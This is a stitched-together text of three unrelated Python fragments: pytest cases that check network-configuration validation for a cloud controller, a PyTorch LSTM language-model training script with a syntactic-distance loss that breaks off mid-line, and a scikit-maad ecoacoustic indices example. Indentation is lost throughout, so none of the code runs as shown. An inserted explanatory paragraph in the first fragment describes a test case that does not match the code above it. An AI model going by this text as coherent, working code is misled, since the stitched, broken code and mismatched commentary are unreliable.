system_config = cr.parse_system_config(systemfile)
system_config.set('MGMT_NETWORK', 'CIDR', 'fdf8:f53e:61e4::18/64')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test management CIDR that is too small
system_config = cr.parse_system_config(systemfile)
system_config.set('MGMT_NETWORK', 'CIDR', '192.168.42.0/29')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
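The overlap case above expects validation to reject a management CIDR that collides with the OAM network. A hypothetical sketch of such a check using the stdlib `ipaddress` module (the real logic lives in controllerconfig's validators, which are not shown here):

```python
import ipaddress

# Hypothetical sketch of the network-overlap check these tests exercise;
# the function name is illustrative, not controllerconfig's actual API.
def networks_overlap(cidr_a, cidr_b):
    return ipaddress.ip_network(cidr_a).overlaps(ipaddress.ip_network(cidr_b))

assert networks_overlap('10.10.10.0/24', '10.10.10.0/24')
assert not networks_overlap('192.168.42.0/24', '10.10.10.0/24')
```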
def test_system_config_validation():
""" Test detection of various errors in system_config file """
# Create the path to the system_config files
simple_systemfile = os.path.join(
os.getcwd(), "controllerconfig/tests/files/", "system_config.simple")
ipv6_systemfile = os.path.join(
os.getcwd(), "controllerconfig/tests/files/", "system_config.ipv6")
lag_vlan_systemfile = os.path.join(
os.getcwd(), "controllerconfig/tests/files/", "system_config.lag.vlan")
ceph_systemfile = os.path.join(
os.getcwd(), "controllerconfig/tests/files/", "system_config.ceph")
static_addr_systemfile = os.path.join(
os.getcwd(), "controllerconfig/tests/files/",
"system_config.static_addr")
# Test floating outside of OAM_NETWORK CIDR
system_config = cr.parse_system_config(ipv6_systemfile)
system_config.set('OAM_NETWORK', 'IP_FLOATING_ADDRESS', 'fc00:db20:35b:7399::5')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test non-ipv6 unit address
system_config = cr.parse_system_config(ipv6_systemfile)
system_config.set('OAM_NETWORK', 'IP_UNIT_0_ADDRESS', '10.10.10.3')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test missing pxeboot network when using IPv6 management network
system_config = cr.parse_system_config(ipv6_systemfile)
system_config.remove_section('PXEBOOT_NETWORK')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test ridiculously sized management network
system_config = cr.parse_system_config(ipv6_systemfile)
system_config.set('MGMT_NETWORK', 'IP_START_ADDRESS', 'fc00:db20:35b:7399:5:0:0:0')
system_config.set('MGMT_NETWORK', 'IP_END_ADDRESS',
'fc00:db20:35b:7399:5:ffff:ffff:ffff')
system_config.remove_option('MGMT_NETWORK', 'IP_FLOATING_ADDRESS')
system_config.remove_option('MGMT_NETWORK', 'IP_UNIT_0_ADDRESS')
system_config.remove_option('MGMT_NETWORK', 'IP_UNIT_1_ADDRESS')
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
validate(system_config, DEFAULT_CONFIG, None, False)
# Test using start/end addresses
system_config = cr.parse_system_config(ipv6_systemfile)
system_config.set('OAM_NETWORK', 'IP_START_ADDRESS', 'abcd::2')
system_config.set('OAM_NETWORK', 'IP_END_ADDRESS', 'abcd::4')
system_config.remove_option('OAM_NETWORK', 'IP_FLOATING_ADDRESS')
system_config.remove_option('OAM_NETWORK', 'IP_UNIT_0_ADDRESS')
system_config.remove_option('OAM_NETWORK', 'IP_UNIT_1_ADDRESS')
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
validate(system_config, DEFAULT_CONFIG, None, False)
# Test detection of an invalid PXEBOOT_CIDR
system_config = cr.parse_system_config(lag_vlan_systemfile)
system_config.set('PXEBOOT_NETWORK', 'PXEBOOT_CIDR',
'192.168.1.4/24')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
system_config.set('PXEBOOT_NETWORK', 'PXEBOOT_CIDR',
'FD00::0000/64')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
system_config.set('PXEBOOT_NETWORK', 'PXEBOOT_CIDR',
'192.168.1.0/29')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
system_config.remove_option('PXEBOOT_NETWORK', 'PXEBOOT_CIDR')
with pytest.raises(configparser.NoOptionError):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(configparser.NoOptionError):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test overlap of MGMT_NETWORK CIDR
system_config = cr.parse_system_config(lag_vlan_systemfile)
system_config.set('MGMT_NETWORK', 'CIDR', '192.168.203.0/26')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test invalid MGMT_NETWORK LAG_MODE
system_config = cr.parse_system_config(lag_vlan_systemfile)
system_config.set('LOGICAL_INTERFACE_1', 'LAG_MODE', '2')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test MGMT_NETWORK VLAN not allowed
system_config = cr.parse_system_config(simple_systemfile)
system_config.set('MGMT_NETWORK', 'VLAN', '123')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test MGMT_NETWORK VLAN missing
system_config = cr.parse_system_config(lag_vlan_systemfile)
system_config.remove_option('MGMT_NETWORK', 'VLAN')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test MGMT_NETWORK start address specified without end address
system_config = cr.parse_system_config(simple_systemfile)
system_config.set('MGMT_NETWORK', 'IP_START_ADDRESS', '192.168.204.2')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test MGMT_NETWORK end address specified without start address
system_config = cr.parse_system_config(simple_systemfile)
system_config.set('MGMT_NETWORK', 'IP_END_ADDRESS', '192.168.204.200')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test MGMT_NETWORK start and end range does not have enough addresses
system_config = cr.parse_system_config(static_addr_systemfile)
system_config.set('MGMT_NETWORK', 'IP_START_ADDRESS', '192.168.204.2')
system_config.set('MGMT_NETWORK', 'IP_END_ADDRESS', '192.168.204.8')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test MGMT_NETWORK start address not in subnet
system_config = cr.parse_system_config(simple_systemfile)
system_config.set('MGMT_NETWORK', 'IP_START_ADDRESS', '192.168.200.2')
system_config.set('MGMT_NETWORK', 'IP_END_ADDRESS', '192.168.204.254')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test MGMT_NETWORK end address not in subnet
system_config = cr.parse_system_config(simple_systemfile)
system_config.set('MGMT_NETWORK', 'IP_START_ADDRESS', '192.168.204.2')
system_config.set('MGMT_NETWORK', 'IP_END_ADDRESS', '192.168.214.254')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test overlap of INFRA_NETWORK CIDR
system_config = cr.parse_system_config(lag_vlan_systemfile)
system_config.set('INFRA_NETWORK', 'CIDR', '192.168.203.0/26')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
system_config.set('INFRA_NETWORK', 'CIDR', '192.168.204.0/26')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test invalid INFRA_NETWORK LAG_MODE
system_config = cr.parse_system_config(lag_vlan_systemfile)
system_config.add_section('LOGICAL_INTERFACE_2')
system_config.set('LOGICAL_INTERFACE_2', 'LAG_INTERFACE', 'Y')
system_config.set('LOGICAL_INTERFACE_2', 'LAG_MODE', '3')
system_config.set('LOGICAL_INTERFACE_2', 'INTERFACE_MTU', '1500')
system_config.set('LOGICAL_INTERFACE_2', 'INTERFACE_PORTS', 'eth3,eth4')
system_config.set('INFRA_NETWORK', 'LOGICAL_INTERFACE',
'LOGICAL_INTERFACE_2')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test INFRA_NETWORK VLAN overlap
system_config = cr.parse_system_config(lag_vlan_systemfile)
system_config.set('INFRA_NETWORK', 'VLAN', '123')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test overlap of CLUSTER_NETWORK CIDR
system_config = cr.parse_system_config(lag_vlan_systemfile)
system_config.set('CLUSTER_NETWORK', 'CIDR', '192.168.203.0/26')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
system_config.set('CLUSTER_NETWORK', 'CIDR', '192.168.204.0/26')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test invalid CLUSTER_NETWORK LAG_MODE
system_config = cr.parse_system_config(lag_vlan_systemfile)
system_config.add_section('LOGICAL_INTERFACE_2')
system_config.set('LOGICAL_INTERFACE_2', 'LAG_INTERFACE', 'Y')
system_config.set('LOGICAL_INTERFACE_2', 'LAG_MODE', '3')
system_config.set('LOGICAL_INTERFACE_2', 'INTERFACE_MTU', '1500')
system_config.set('LOGICAL_INTERFACE_2', 'INTERFACE_PORTS', 'eth3,eth4')
system_config.set('CLUSTER_NETWORK', 'LOGICAL_INTERFACE',
'LOGICAL_INTERFACE_2')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test CLUSTER_NETWORK VLAN overlap
system_config = cr.parse_system_config(lag_vlan_systemfile)
system_config.set('CLUSTER_NETWORK', 'VLAN', '123')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test overlap of OAM_NETWORK CIDR
system_config = cr.parse_system_config(lag_vlan_systemfile)
system_config.set('OAM_NETWORK', 'CIDR', '192.168.203.0/26')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
system_config.set('OAM_NETWORK', 'CIDR', '192.168.204.0/26')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
system_config.set('OAM_NETWORK', 'CIDR', '192.168.205.0/26')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test invalid OAM_NETWORK LAG_MODE
system_config = cr.parse_system_config(lag_vlan_systemfile)
system_config.add_section('LOGICAL_INTERFACE_2')
system_config.set('LOGICAL_INTERFACE_2', 'LAG_INTERFACE', 'Y')
system_config.set('LOGICAL_INTERFACE_2', 'LAG_MODE', '3')
system_config.set('LOGICAL_INTERFACE_2', 'INTERFACE_MTU', '1500')
| |
import argparse
import os
import time
import math
import random
import hashlib
import numpy
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim.lr_scheduler as lr_scheduler
import data
import model
from utils import rankloss, get_batch, repackage_hidden
from splitcross import SplitCrossEntropyLoss
parser = argparse.ArgumentParser(description='PyTorch PennTreeBank RNN/LSTM Language Model')
parser.add_argument('--data', type=str, default='data/syntactic_penn/',
help='location of the data corpus')
parser.add_argument('--model', type=str, default='LSTM',
help='type of recurrent net (LSTM, QRNN, GRU)')
parser.add_argument('--emsize', type=int, default=400,
help='size of word embeddings')
parser.add_argument('--nhid', type=int, default=1150,
help='number of hidden units per layer')
parser.add_argument('--chunk_size', type=int, default=10,
help='number of units per chunk')
parser.add_argument('--nlayers', type=int, default=3,
help='number of layers')
parser.add_argument('--lr', type=float, default=30,
help='initial learning rate')
parser.add_argument('--clip', type=float, default=0.25,
help='gradient clipping')
parser.add_argument('--epochs', type=int, default=1000,
help='upper epoch limit')
parser.add_argument('--batch_size', type=int, default=20, metavar='N',
help='batch size')
parser.add_argument('--bptt', type=int, default=70,
help='sequence length')
parser.add_argument('--dropout', type=float, default=0.45,
help='dropout applied to layers (0 = no dropout)')
parser.add_argument('--dropouth', type=float, default=0.3,
help='dropout for rnn layers (0 = no dropout)')
parser.add_argument('--dropouti', type=float, default=0.5,
help='dropout for input embedding layers (0 = no dropout)')
parser.add_argument('--dropoute', type=float, default=0.125,
help='dropout to remove words from embedding layer (0 = no dropout)')
parser.add_argument('--wdrop', type=float, default=0.45,
help='amount of weight dropout to apply to the RNN hidden to hidden matrix')
parser.add_argument('--seed', type=int, default=141,
help='random seed')
parser.add_argument('--nonmono', type=int, default=5,
help='number of recent validation losses considered by the non-monotonic early-stopping criterion')
parser.add_argument('--cuda', action='store_false',
help='use CUDA')
parser.add_argument('--log-interval', type=int, default=500, metavar='N',
help='report interval')
# randomhash = ''.join(str(time.time()).split('.'))
# parser.add_argument('--save', type=str, default=randomhash + '.pt',
# help='path to save the final model')
parser.add_argument('--alpha', type=float, default=2,
help='alpha L2 regularization on RNN activation (alpha = 0 means no regularization)')
parser.add_argument('--beta', type=float, default=1,
help='beta slowness regularization applied on RNN activation (beta = 0 means no regularization)')
parser.add_argument('--wdecay', type=float, default=1.2e-6,
help='weight decay applied to all weights')
# parser.add_argument('--resume', type=str, default='',
# help='path of model to resume')
parser.add_argument('--optimizer', type=str, default='sgd', choices=['sgd', 'adam'],
help='optimizer to use (sgd, adam)')
parser.add_argument('--when', nargs="+", type=int, default=[-1],
help='When (which epochs) to divide the learning rate by 10 - accepts multiple')
parser.add_argument('--finetuning', type=int, default=650,
help='When (which epochs) to switch to finetuning')
parser.add_argument('--philly', action='store_true',
help='Use philly cluster')
parser.add_argument('--device', type=int, default=0, help='select GPU')
parser.add_argument('--l4d', type=int, default=2, choices=[-1, 0, 1, 2], help='layer for distance')
parser.add_argument('--margin', type=float, default=1.0,
help='margin at rank loss')
parser.add_argument('--wds', type=str, default='middle', choices=['no', 'before', 'middle', 'after'],
help='different ways to use weighted distance signal')
parser.add_argument('--un', action='store_true',
help='unsupervised settings')
parser.add_argument('--sratio', type=float, default=1.0,
help='supervised signal ratio')
parser.add_argument('--dratio', type=float, default=1.0,
help='data size ratio')
parser.add_argument('--alpha1', type=float, default=1.0)
parser.add_argument('--alpha2', type=float, default=1.0)
args = parser.parse_args()
args.tied = True
args.batch_size_tune = args.batch_size_init = args.batch_size
if not os.path.isdir('params/'):
os.mkdir('params')
save_string = 'params/' + hashlib.md5(str(args).encode()).hexdigest() + '.pt'
print("Params saving to: " + save_string)
assert 0.0 <= args.margin <= 1.0
assert 0.0 <= args.sratio <= 1.0
args.penn_only = False
if args.un:
args.penn_only = True
args.wds = "no"
# Set the random seed manually for reproducibility.
torch.manual_seed(args.seed)
random.seed(args.seed)
numpy.random.seed(args.seed)
if torch.cuda.is_available():
torch.cuda.set_device(args.device)
if not args.cuda:
print("WARNING: You have a CUDA device, so you should probably run with --cuda")
else:
torch.cuda.manual_seed(args.seed)
###############################################################################
# Load data
###############################################################################
def model_save(fn):
if args.philly:
fn = os.path.join(os.environ['PT_OUTPUT_DIR'], fn)
with open(fn, 'wb') as f:
torch.save([epoch, model, criterion, optimizer], f)
def model_load(fn):
global epoch, model, criterion, optimizer
if args.philly:
fn = os.path.join(os.environ['PT_OUTPUT_DIR'], fn)
with open(fn, 'rb') as f:
epoch, model, criterion, optimizer = torch.load(f)
fn = 'corpus.{}.data'.format(hashlib.md5(args.data.encode()).hexdigest())
if args.philly:
fn = os.path.join(os.environ['PT_OUTPUT_DIR'], fn)
if os.path.exists(fn) and args.data != 'data/syntactic_penn/':
print('Loading cached dataset...')
corpus = torch.load(fn)
else:
print('Producing dataset...')
corpus = data.syntactic_penn(args, args.batch_size_init, args.dratio)
torch.save(corpus, fn)
train_data = corpus[0]
train_dist = corpus[1]
val_data = corpus[2]
test_data = corpus[3]
args.vocab_size = len(corpus[4])
print("done loading, vocabulary size: {}".format(args.vocab_size))
eval_batch_size = 80
test_batch_size = 1
###############################################################################
# Build the model
###############################################################################
criterion = None
ntokens = args.vocab_size
model = model.RNNModel(args.model, ntokens, args.emsize, args.nhid,
args.chunk_size, args.nlayers, args.wds,args.dropout,
args.dropouth, args.dropouti, args.dropoute,
args.wdrop, args.tied, args.l4d)
###
start_epoch = 0
if os.path.exists(save_string):
print('Resuming model ...')
model_load(save_string)
start_epoch = epoch
optimizer.param_groups[0]['lr'] = args.lr
model.dropouti, model.dropouth, model.dropout, args.dropoute = \
args.dropouti, args.dropouth, args.dropout, args.dropoute
if args.wdrop:
for rnn in model.rnn.cells:
rnn.hh.dropout = args.wdrop
###
if not criterion:
splits = []
if ntokens > 500000:
# One Billion
# This produces fairly even matrix mults for the buckets:
# 0: 11723136, 1: 10854630, 2: 11270961, 3: 11219422
splits = [4200, 35000, 180000]
elif ntokens > 75000:
# WikiText-103
splits = [2800, 20000, 76000]
print('Using', splits)
criterion = SplitCrossEntropyLoss(args.emsize, splits=splits, verbose=False)
###
if args.cuda:
model = model.cuda()
criterion = criterion.cuda()
###
params = list(model.parameters()) + list(criterion.parameters())
total_params = sum(x.size()[0] * x.size()[1] if len(x.size()) > 1 else x.size()[0] for x in params if x.size())
print('Args:', args)
print('Model total parameters:', total_params)
###############################################################################
# Training code
###############################################################################
@torch.no_grad()
def evaluate(data_source, batch_size=10):
# Turn on evaluation mode which disables dropout.
model.eval()
if args.model == 'QRNN': model.reset()
total_loss = 0
ntokens = args.vocab_size
hidden = model.init_hidden(batch_size)
for i in range(0, data_source.size(0) - 1, args.bptt):
data, targets = get_batch(data_source, i, args, evaluation=True)
output, hidden = model(data, hidden)
total_loss += len(data) * criterion(model.decoder.weight,
model.decoder.bias,
output, targets).data
hidden = repackage_hidden(hidden)
return total_loss.item() / len(data_source)
def train(train_batch_size):
# Turn on training mode which enables dropout.
if args.model == 'QRNN': model.reset()
total_loss = total_sdloss = 0
start_time = time.time()
ntokens = args.vocab_size
hidden = model.init_hidden(train_batch_size)
batch, i = 0, 0
train_data_full_size = train_data.size(0) - 1 - 1
while i < train_data_full_size:
bptt = args.bptt if np.random.random() < 0.95 else args.bptt / 2.
# Prevent excessively small or negative sequence lengths
seq_len = max(5, int(np.random.normal(bptt, 5)))
# There's a very small chance that it could select a very long sequence
# length, resulting in OOM:
# seq_len = min(seq_len, args.bptt + 10)
lr2 = optimizer.param_groups[0]['lr']
optimizer.param_groups[0]['lr'] = lr2 * seq_len / args.bptt
model.train()
data, targets = get_batch(train_data, i, args, seq_len=seq_len)
dist, _ = get_batch(train_dist, i, args, seq_len=seq_len)
# Starting each batch, we detach the hidden state from how it was
# previously produced. If we didn't, the model would try
# backpropagating all the way to start of the dataset.
hidden = repackage_hidden(hidden)
optimizer.zero_grad()
output, hidden, rnn_hs, dropped_rnn_hs = model(data, hidden, return_h=True)
# output, hidden = model(data, hidden, return_h=False)
raw_loss = criterion(model.decoder.weight, model.decoder.bias, output, targets)
loss = raw_loss
# Activation Regularization
if args.alpha:
loss = loss + sum(
args.alpha * dropped_rnn_h.pow(2).mean()
for dropped_rnn_h in dropped_rnn_hs[-1:]
)
# Temporal Activation Regularization (slowness)
if args.beta:
loss = loss + sum(
args.beta * (rnn_h[1:] - rnn_h[:-1]).pow(2).mean()
for rnn_h in rnn_hs[-1:]
)
forget_distance = model.distance[1]
if args.l4d >= 0:
single_layer_distance = forget_distance[args.l4d]
distance_loss = rankloss(single_layer_distance, dist, margin=args.margin)
else:
distance_loss = rankloss(forget_distance[0], dist, margin=args.margin) \
+ rankloss(forget_distance[2], dist, margin=args.margin)
if i < train_data_full_size * args.sratio:
sd_loss = args.alpha1 * loss + args.alpha2 * distance_loss
else:
sd_loss = loss
if args.penn_only:
loss.backward()
else:
sd_loss.backward()
# `clip_grad_norm` helps prevent the exploding gradient problem in RNNs / LSTMs.
if args.clip: torch.nn.utils.clip_grad_norm_(params, args.clip)
optimizer.step()
total_loss += raw_loss.data
total_sdloss += sd_loss.data
optimizer.param_groups[0]['lr'] = lr2
if batch % args.log_interval == 0 and batch > 0:
cur_loss = total_loss.item() / args.log_interval
cur_sdloss = total_sdloss.item() / args.log_interval
elapsed = time.time() - start_time
print('| epoch {:3d} | {:5d}/{:5d} batches | lr {:05.5f} | ms/batch {:5.2f} | '
'loss {:5.2f} | ppl {:8.2f} | bpc {:8.3f} | dist {:2.5f}'.format(
epoch, batch, len(train_data) // args.bptt, optimizer.param_groups[0]['lr'],
elapsed * 1000 / args.log_interval, cur_loss,
math.exp(cur_loss), cur_loss / math.log(2), cur_sdloss))
total_loss = total_sdloss = 0
start_time = time.time()
###
batch += 1
i += seq_len
# Loop over epochs.
lr = args.lr
best_val_loss = []
stored_loss = 100000000
# At any point you can hit Ctrl + C to break out of training early.
try:
optimizer = None
# Ensure the optimizer is optimizing params, which includes both the
# model's weights as well as the criterion's weight (i.e. Adaptive Softmax)
if args.optimizer == 'sgd':
optimizer = torch.optim.SGD(params, lr=args.lr, weight_decay=args.wdecay)
if args.optimizer == 'adam':
optimizer = torch.optim.Adam(params, lr=args.lr, betas=(0, 0.999),
eps=1e-9, weight_decay=args.wdecay)
scheduler = lr_scheduler.ReduceLROnPlateau(optimizer, 'min', 0.5,
patience=2, threshold=0)
for epoch in range(start_epoch + 1, args.epochs + 1):
if epoch <= args.finetuning:
train_batch_size = args.batch_size_init
else:
train_batch_size = args.batch_size_tune
epoch_start_time = time.time()
train(train_batch_size)
if 't0' in optimizer.param_groups[0]:
tmp = {}
for prm in model.parameters():
tmp[prm] = prm.data.clone()
prm.data = optimizer.state[prm]['ax'].clone()
val_loss2 = evaluate(val_data, eval_batch_size)
print('-' * 89)
print('| end of epoch {:3d} | time: {:5.2f}s | valid loss {:5.2f} | '
'valid ppl {:8.2f} | valid bpc {:8.3f}'.format(
epoch, (time.time() - epoch_start_time), val_loss2,
math.exp(val_loss2), val_loss2 / math.log(2)))
print('-' * 89)
if val_loss2 < stored_loss:
model_save(save_string)
print('Saving Averaged!')
stored_loss = val_loss2
for prm in model.parameters():
prm.data = tmp[prm].clone()
if epoch == args.finetuning:
print('Switching to finetuning')
optimizer = torch.optim.ASGD(model.parameters(), lr=args.lr,
t0=0, lambd=0.,
weight_decay=args.wdecay)
best_val_loss = []
if (epoch > args.finetuning and
len(best_val_loss) > args.nonmono and
val_loss2 > min(best_val_loss[:-args.nonmono])):
print('Done!')
import sys
sys.exit(1)
else:
val_loss = evaluate(val_data, eval_batch_size)
print('-' * 89)
print('| end of epoch {:3d} | time: {:5.2f}s | valid loss {:5.2f} | '
'valid ppl {:8.2f} | valid bpc {:8.3f}'.format(
epoch, (time.time() | |
# -*- coding: utf-8 -*-
"""
Created on Mon Aug 6 17:59:44 2018
This script gives an example of how to use scikit-MAAD for ecoacoustics indices
"""
#
# Authors: <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
#
# License: New BSD License
print(__doc__)
# Clear all the variables
from IPython import get_ipython
get_ipython().magic('reset -sf')
# =============================================================================
# Load the modules
# =============================================================================
import matplotlib.pyplot as plt
import pandas as pd # for csv
import numpy as np
from numpy import sum, log, log10, min, max, abs, mean, median, sqrt, diff
from skimage import filters
# min value
import sys
_MIN_ = sys.float_info.min
# =============================================================================
# ############## Import MAAD module
from pathlib import Path # in order to be wind/linux/MacOS compatible
import os
# change the path to the current path where the script is located
# Get the current dir of the current file
dir_path = os.path.dirname(os.path.realpath(__file__))
os.chdir(dir_path)
maad_path = Path(dir_path).parents[0]
os.sys.path.append(maad_path.as_posix())
import maad
# Close all the figures (like in Matlab)
plt.close("all")
"""****************************************************************************
# ------------------- options ---------------------------
****************************************************************************"""
# root directory of the files
base_path = Path(__file__).parent
datadir = (base_path / "../data/").resolve()
savedir = datadir
save_csv = 'results_indices.csv'
CHANNEL = 'left'
MODE_ENV = 'fast'  # 'fast' or 'hilbert'
Nt = 512 # frame size (in points)
N = 1024 # fft size (in points)
NOVLP = N//2 # N//2
WIN = 'hanning'  # 'boxcar' or 'hanning'
dB_RANGE = 120
dB_GAIN = 0
FREQ_ANTHRO_MIN = 0
FREQ_ANTHRO_MAX = 1000
FREQ_BIO_MIN = 1000
FREQ_BIO_MAX = 15000
FREQ_INSECT_MIN = 15000
FREQ_INSECT_MAX = 20000
ANTHRO_BAND = (FREQ_ANTHRO_MIN, FREQ_ANTHRO_MAX)
BIO_BAND = (FREQ_BIO_MIN, FREQ_BIO_MAX)
INSECT_BAND = (FREQ_INSECT_MIN, FREQ_INSECT_MAX)
DISPLAY = False
"""****************************************************************************
# ------------------- end options ---------------------------
****************************************************************************"""
"""****************************************************************************
# -------------- LOAD SOUND AND PREPROCESS SOUND ---------------------------
****************************************************************************"""
# parse a directory in order to get a df with date and fullfilename
df = maad.util.date_parser(datadir)
# select the files
# =============================================================================
# ##### EXAMPLES
# # see https://pandas.pydata.org/pandas-docs/stable/timeseries.html
# # Returning an array containing the hours for each row in your dataframe
# df.index.hour
# # grab all rows where the time is between 12h and 13h,
# df.between_time('12:00:00','13:00:00')
# # Increment the time by 1 microsecond
# df.index = df.index+ pd.Timedelta(microseconds=1)
# date_selec = pd.date_range('2018-07-14', '2018-07-20')
# =============================================================================
## Select data between date range
#T0 = '2019-03-01 00:00:00'
#T1 = '2019-04-01 00:00:00'
#sub_df = df[T0:T1]
# or keep all data
sub_df = df
# or select a subset of rows (here, the first 4 files)
sub_df = df.iloc[0:4]
# define the indices' lists
# c_ for column_
N_FILE = len(sub_df)
c_file = []
c_clipping = []
c_BGNt = []
c_SNRt = []
c_M = []
c_ENT = []
c_ACTtFraction = []
c_ACTtCount = []
c_ACTtMean = []
c_EVNtSsum = []
c_EVNtMean = []
c_EVNtCount = []
c_BGNf = []
c_SNRf = []
c_EAS = []
c_ECU = []
c_ECV = []
c_EPS = []
c_H = []
c_ACI = []
c_NDSI = []
c_rBA = []
c_BI = []
c_ADI = []
c_AEI = []
c_ROU = []
c_LFC = []
c_MFC = []
c_HFC = []
c_ACTspFraction = []
c_ACTspCount = []
c_ACTspMean = []
c_EVNspSum = []
c_EVNspMean = []
c_EVNspCount = []
c_LTR = []
for index, row in sub_df.iterrows():
# get the full filename of the corresponding row
fullfilename = row['file']
# Save file basename
path, filename = os.path.split(fullfilename)
savefile_base = filename[0:-4]
savefile = os.path.join(savedir,savefile_base)
print ('\n***********************')
print (filename)
"""========================================================================
===========================================================================
Computation in the time domain
===========================================================================
======================================================================= """
#### Load the original sound
try :
wave,fs = maad.sound.load(filename=fullfilename, channel=CHANNEL, detrend=True, verbose=False)
except:
# Delete the row if the file does not exist or raise a value error (i.e. no EOF)
sub_df.drop(index, inplace=True)
continue
#### Highpass signal (10 Hz)
